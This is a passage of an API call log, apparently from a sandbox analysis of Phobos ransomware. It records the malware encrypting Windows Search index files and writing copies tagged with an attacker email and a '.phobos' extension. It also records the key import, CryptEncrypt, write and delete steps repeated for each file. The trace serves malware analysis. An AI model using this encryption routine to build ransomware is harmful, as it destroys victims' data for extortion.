liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.664] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0001.000.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0001.000.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0174.664] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ce8) returned 1 [0174.664] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.664] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf0, lpOverlapped=0x0) returned 1 [0174.665] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100, dwBufLen=0x100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100) returned 1 [0174.680] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x100, lpOverlapped=0x0) returned 1 [0174.681] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0174.681] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.681] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0174.681] CryptDestroyKey (hKey=0xa32d28) returned 1 [0174.681] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0174.682] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0174.682] CloseHandle (hObject=0x130) returned 1 [0174.682] CloseHandle (hObject=0x180) returned 1 [0174.682] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0001.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0001.000")) returned 1 [0174.683] SetEvent (hEvent=0xe8) returned 1 [0174.684] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0174.684] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0001.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0001.001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0174.840] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0174.840] CloseHandle (hObject=0x138) returned 1 [0174.840] SetEvent (hEvent=0xe8) returned 1 [0174.840] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0174.840] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAD0001.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciad0001.000"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0174.841] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=240) returned 1 [0174.841] CloseHandle (hObject=0x138) returned 1 [0174.841] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAD0001.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciad0001.000")) returned 0x2020 [0174.841] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAD0001.000.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciad0001.000.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.841] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAD0001.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciad0001.000"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0174.841] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.841] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.841] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAD0001.000.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciad0001.000.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.842] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32be8) returned 1 [0174.842] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.842] ReadFile (in: hFile=0x138, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf0, lpOverlapped=0x0) returned 1 [0174.843] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100, dwBufLen=0x100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100) returned 1 [0174.843] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x100, lpOverlapped=0x0) returned 1 [0174.843] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0174.843] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.843] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0174.843] CryptDestroyKey (hKey=0xa327e8) returned 1 [0174.844] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0174.844] CryptDestroyKey (hKey=0xa32be8) returned 1 [0174.844] CloseHandle (hObject=0x138) returned 1 [0174.844] CloseHandle (hObject=0x158) returned 1 [0174.844] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAD0001.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciad0001.000")) returned 1 [0174.845] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0174.845] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAD0001.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciad0001.001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.845] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0174.845] CloseHandle (hObject=0x158) returned 1 [0174.845] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0174.845] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAD0001.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciad0001.002"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.846] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0174.846] CloseHandle (hObject=0x158) returned 1 [0174.846] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0174.846] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.000"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.847] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=240) returned 1 [0174.847] CloseHandle (hObject=0x158) returned 1 [0174.847] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.000")) returned 0x2020 [0174.847] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.000.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.000.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.847] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.000"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.848] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.848] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.848] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.000.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.000.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0174.848] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32be8) returned 1 [0174.848] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.848] ReadFile (in: hFile=0x158, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf0, lpOverlapped=0x0) returned 1 [0174.849] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100, dwBufLen=0x100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100) returned 1 [0174.849] WriteFile (in: hFile=0x138, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x100, lpOverlapped=0x0) returned 1 [0174.850] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0174.850] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.850] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0174.850] CryptDestroyKey (hKey=0xa327e8) returned 1 [0174.850] WriteFile (in: hFile=0x138, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0174.850] CryptDestroyKey (hKey=0xa32be8) returned 1 [0174.850] CloseHandle (hObject=0x158) returned 1 [0174.850] CloseHandle (hObject=0x138) returned 1 [0174.850] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.000")) returned 1 [0174.851] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0174.851] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0174.851] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=65536) returned 1 [0174.851] CloseHandle (hObject=0x138) returned 1 [0174.851] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.001")) returned 0x2020 [0174.852] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.852] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.001"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0174.852] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.852] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.852] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.854] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32be8) returned 1 [0174.854] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.854] ReadFile (in: hFile=0x138, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x10000, lpOverlapped=0x0) returned 1 [0174.883] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10010, dwBufLen=0x10010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10010) returned 1 [0174.883] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x10010, lpOverlapped=0x0) returned 1 [0174.885] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32968) returned 1 [0174.885] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.885] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0174.885] CryptDestroyKey (hKey=0xa32968) returned 1 [0174.885] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0174.885] CryptDestroyKey (hKey=0xa32be8) returned 1 [0174.885] CloseHandle (hObject=0x138) returned 1 [0174.885] CloseHandle (hObject=0x158) returned 1 [0174.885] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.001")) returned 1 [0174.886] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0174.886] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\SETTINGS.DIA" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\settings.dia"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.887] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=4) returned 1 [0174.887] CloseHandle (hObject=0x158) returned 1 [0174.887] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\SETTINGS.DIA" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\settings.dia")) returned 0x2020 [0174.887] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\SETTINGS.DIA.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\settings.dia.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.887] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\SETTINGS.DIA" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\settings.dia"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.887] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.887] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.887] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\SETTINGS.DIA.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\settings.dia.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0174.888] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32be8) returned 1 [0174.888] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.888] ReadFile (in: hFile=0x158, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4, lpOverlapped=0x0) returned 1 [0174.888] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10, dwBufLen=0x10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10) returned 1 [0174.888] WriteFile (in: hFile=0x138, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x10, lpOverlapped=0x0) returned 1 [0174.889] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32968) returned 1 [0174.889] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.889] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0174.889] CryptDestroyKey (hKey=0xa32968) returned 1 [0174.889] WriteFile (in: hFile=0x138, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0174.889] CryptDestroyKey (hKey=0xa32be8) returned 1 [0174.889] CloseHandle (hObject=0x158) returned 1 [0174.889] CloseHandle (hObject=0x138) returned 1 [0174.890] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\SETTINGS.DIA" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\settings.dia")) returned 1 [0174.890] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: 